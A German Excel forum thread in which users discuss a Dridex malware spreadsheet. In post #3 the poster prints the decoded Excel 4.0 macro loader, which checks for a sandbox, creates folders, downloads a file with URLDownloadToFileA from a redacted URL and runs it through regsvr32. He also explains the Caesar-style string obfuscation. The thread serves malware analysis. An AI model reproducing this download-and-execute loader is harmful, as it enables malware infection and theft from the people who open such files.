Clever-Excel-Forum Office-Anwendungen Excel v
Dridex: VBA lesen

Thema geschlossen 
Baumstrukturmodus
Dridex: VBA lesen
Fennek Offline
Benutzer
Registriert seit: 06.12.2015
Version(en): 2016
#1
10.09.2020, 10:03 (Dieser Beitrag wurde zuletzt bearbeitet: 11.09.2020, 09:34 von Kl@us-M..)
Hallo,

im Anhang befindet sich der VBA-Code und der Inhalt einiger Zellen einer xlsx-Version der Dridex-malware. Das Auslesen unter Linux mit LibreOffice kann auch einige Inhalte, z.B. Beschriftung von Shapes, nicht erkennen, so dass es keine Garantie auf Vollständigkeit gibt.

Den VBA-Code kann ich nicht entziffern, aber bei den Zellinhalten (am Ende der Datei) kann ich nicht einmal die Sprache erkennen. Könnte das Excel4Macro-Code sein? Es ist immer mögllich, dass einige Teile nur zur Verwirrung und Verschleierung eingefügt wurden.

mfg

(Ein Spezialist konnte 4 url's auslesen, aber er hat nicht beschrieben, wie das geht)
(Die Datei ist frei im Netz verfügbar, trotzdem möchte ich keine google-fähigen Informationen veröffentlichen)

ANHANG AUF WUSCH DES THREADERSTELLERS GELÖSCHT
MODERATOR
[-] Folgende(r) 1 Nutzer sagt Danke an Fennek für diesen Beitrag:
  • Mase
Suchen
Top
ralf_b Offline
Benutzer
Registriert seit: 12.06.2020
Version(en): 2024, 365business
#2
10.09.2020, 12:41
code obfuscation würde ich sagen.
Suchen
Top
Fennek Offline
Benutzer
ThreadStarter

Registriert seit: 06.12.2015
Version(en): 2016
#3
11.09.2020, 11:04
Hallo,

sorry, nach langer Analyse der Word-Version, habe ich bei der Excel-Version etwas die Nerven verloren.

Am späteren Abend und nach einer "Rundreise" durch die mit der malware verknüften Twitter-Accounts der Reporter habe ich dann die Lösung gefunden:

Im Gegensatz zu meinen Vorurteilen sind Excel4Macro alles andere als harmlos:

Code:
Range("A460:A464") '#### Excel4Macro DEAKTIVIEREN ####

IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(TRUE))
CALL("Kernel32","CreateDirectoryA","JCJ","C:\;",0)
CALL("Kernel32","CreateDirectoryA","JCJ","C:\;\'",0)
CALL("URLMON","URLDownloadToFileA", "JJCCJJ",0,"X","C:\;\'\$.",0,0)
CALL("Shell32","ShellExecuteA", "JJCCCCJ",0,"Open","regsvr32"," -s C:\;\'\$.",0,0)

Die "verschlüsselten" Texte erwiesen sich als "Caesar" mit dem Spaltenindex als Parameter.

Damit ergibt sich aus meiner Sicht ein gesellschaftliches Problem: Die malware-Autoren meinten, sehr viele urls in dieser "Loader"-Datei einbetten zu können. Auf der Basis einer Stichprobe von 1 ist zu befürchten, dass diese Annahme nicht ganz falsch ist. Es gibt sehr viele Information, von welchen Servern malware verteilt wird. Diese Server stehen auch in Ländern, die ich für seriös halte, aber das Entfernen kann trotzdem mehrere Tage dauern.

Es gibt sogar eine Liste mit den C2-Servern von Emotet für die letzen 7 Jahre und dem Status "online" bzw "offline". Dabei haben Länder in West-Europa und Nord-Amerika auch einen Anteil. Ich halte diese Liste für "staatsnah", d.h. staatliche IT-Sicherheits-Teams arbeiten dort mit. (nicht Deutschland). Der Anbieter, der clever-excel hosted, war gestern mit einem C2-Server auch aktiv dabei. Sofern ich mich nicht irre, auch in Einzelfällen beim Verteilen von malware.

Da einem Bekannten auf diese Art die Lebenversicherung gestohlen wurde, möchte ich es einmal etwas emotionaler sagen: Es ist zum k...
Suchen
Top
maninweb Offline
Benutzer
Registriert seit: 08.05.2014
Version(en): Office 2010, Office 365, Office 365 Betakanal
#4
11.09.2020, 12:12
Hallo,

hier noch ein bißchen Doku zu CALL: https://support.microsoft.com/en-us/offi...63d188307f
Und ein Artikel (Englisch), den Du aber vielleicht schon kennst: https://www.cybereason.com/blog/excel4.0...e-the-bits

Gruß
Microsoft Excel Expert · Microsoft Most Valuable Professional (MVP) :: 2011-2019 & 2020-2022 :: 10 Awards
https://de.excel-translator.de/translator :: Online Excel-Formel-Übersetzer :: Funktionen :: Fehlerwerte :: Argumente :: Tabellenbezeichner
Homepage Suchen
Top
Thema geschlossen 


Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste